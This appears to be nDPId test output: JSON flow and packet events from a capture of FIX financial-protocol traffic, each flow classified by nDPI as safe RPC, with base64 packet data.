-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755111956,"flow_last_seen":1493755132007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1493755110320,"flow_last_seen":1493755130355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":647,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755113353,"flow_last_seen":1493755123449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7560000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1493755109242,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109242,"pkt":"THK5MeMlACJNe\/gxCABFAACKT3MAAPUGlw4IERYfwKgAFA+gqko3bYCMRQ1qAYAY\/\/+s3wAAAQEICsq+JozkIvOrOD1PATk9MDA3NQEzNT1HAQIgAAANgQxAKWj1wo9cKQAAAAEAABRnDEBj4euA7PpqAAAAAQAADiEMQENwo99tuUEAAAABAAAMAwxAYm64YJmdywAAAAE="} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7560000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1493755109243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109243,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04yxAAEAGeKvAqAAUCBEWH6pKD6BFDWoBN22A4oAQ\/+CtQgAAAQEICuQi8\/bKviaM"} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1493755109243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1493755109243,"pkt":"THK5MeMlACJNe\/gxCABFAABNT3sAAPUGl0MIERYfwKgAFA+gqko3bYDiRQ1qAYAY\/\/8cMQAAAQEICsq+JozkIvOrOD1PATk9MDAxNAEzNT1QAQA4AAAUjFEGgw=="} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7560000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1493755109264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1493755109264,"pkt":"THK5MeMlACJNe\/gxCABFAABSVaMAAPUGkRYIERYfwKgAFA+gu2Bwv8eLGL2htoAY\/\/8FlAAAAQEICsq+JqLD2CKPOD1PATk9MDAxOQEzNT1QAQBgAAAA1ygEAAAC+SgE"} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7560000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1493755109265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109265,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0nQVAAEAGvtLAqAAUCBEWH7tgD6AYvaG2cL\/HqYAQ\/+ACDgAAAQEICsPYIsvKviai"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAABPilIAADIGAaLQ9WsDwKgAFA+gsgqYEHEay+C1D1AYXjiwMAAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} +00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoLPdAAEAGESTAqAAU0PVrA7IKD6DL4LUPmBBxQVAQ\/\/9nMgAAAAAAAAAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAAB3JWUAAPUGwS8IERYfwKgAFA+gu1Cc6Eb967pj5oAY\/\/+1oAAAAQEICsq+Jsaxc69UOD1GSVguNC4xATk9MDAwMDQxATM1PTABMzQ9MDA2MTI3ATQzPU4BNTI9MjAxNzA1MDItMTk6NTg6MjkBMTA9MTEzAQ=="} +00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB+LPhAAEAGEM3AqAAU0PVrA7IKD6DL4LUPmBBxQVAY\/\/8uDQAAOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04B5AAEAGe7nAqAAUCBEWH7tQD6DrumPmnOhHQIAQ\/+BBSgAAAQEICrFztPLKvibG"} +00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1493755109365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1493755109365,"pkt":"THK5MeMlACJNe\/gxCABFAABXdbIAAPUGcQIIERYfwKgAFA+gu2Bwv8epGL2htoAY\/\/9rRwAAAQEICsq+JwbD2CLLOD1PATk9MDAyNAEzNT1HAQCIAAAA1gw\/8YUeuFHrhQAAAAE="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1493755109440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109440,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzMAADIGwMTQ9WsDwKgAFA+gshDsZRC0r0wvBlAYWghECQAAOD1PATk9MDAyNAEzNT1HAQCIAAAAVgxAWLVwoAAAAAAAAAE="} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1493755109440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109440,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPkFAAEAG\/9nAqAAU0PVrA7IQD6CvTC8G7GUQ11AQo65yMAAAAAAAAAAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1493755109654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755109654,"pkt":"THK5MeMlACJNe\/gxCABFAABbr+gAAPUGNsgIERYfwKgAFA+gu1oMn5kifDan54AY\/\/9QgQAAAQEICsq+KCgaP0xfOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} +00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1493755109655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA07JVAAEAGb0LAqAAUCBEWH7taD6B8NqfnDJ+ZSYAQhgAbHwAAAQEICho\/VIrKvigo"} +00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1493755109655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK7JZAAEAGbuvAqAAUCBEWH7taD6B8NqfnDJ+ZSYAYhgDh+QAAAQEICho\/VIrKvigoOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1493755109941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109941,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzQAADIGwMPQ9WsDwKgAFA+gshDsZRDXr0wvBlAYWgiDjAAAOD1PATk9MDAyNAEzNT1HAQCIAAAAWQxAldWZn+Q2dgAAAAE="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7560000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1493755110320,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1493755110320,"pkt":"THK5MeMlACJNe\/gxCABFAAB1U\/wAADIGN9LQ9WsDwKgAFA+glvwzTd9PWnk+l1AYb96N\/wAAOD1PATk9MDA2NgEzNT1HAQHYAAAABVkI5OEMFeFiPZCEMAATlYJyAAAABFkI5OEMFVZHfdCEMAATwIJ3AAAABlkI5OEIW+2APQJxEAQ="} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110320,"flow_last_seen":1493755110320,"flow_idle_time":7560000,"flow_min_l4_payload_len":77,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":77,"midstream":1,"thread_ts_msec":1493755110320,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1493755110328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755110328,"pkt":"THK5MeMlACJNe\/gxCABFAABb5\/wAAPUG\/rMIERYfwKgAFA+gn9aNJ1RO\/ryrG4AY\/\/8NBQAAAQEICsq+KsnWRqh9OD1PATk9MDAyOAEzNT1HAQCoAAAAAVkI5OEMBKkS\/dCEMAAJlIEx"} +00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755110328,"flow_last_seen":1493755110328,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755110328,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1493755110328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755110328,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0b9ZAAEAG7AHAqAAUCBEWH5\/WD6D+vKsbjSdUdYAQ\/\/\/knQAAAQEICtZGrHjKvirJ"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1493755110362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755110362,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAouAtAAEAGhg\/AqAAU0PVrA5b8D6BaeT6XM03fnFAQ\/GxkGwAAAAAAAAAA"} +00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1493755111422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1493755111422,"pkt":"THK5MeMlACJNe\/gxCABFAABwiaEAAPUGXPoIERYfwKgAFA+gn9aNJ1R1\/ryrG4AY\/\/+zfAAAAQEICsq+Lw\/WRqx4OD1PATk9MDA0OQEzNT1HAQFQAAAADVkI5OEMFgYg3VCIUAATiYF3AAAADFkI5OEMB9wg3RAAEAATiYAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755111956,"pkt":"THK5MeMlACJNe\/gxCABFAABP7\/wAADIGm\/fQ9WsDwKgAFA+glvYLJrChYuT9OVAYYmg1SgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 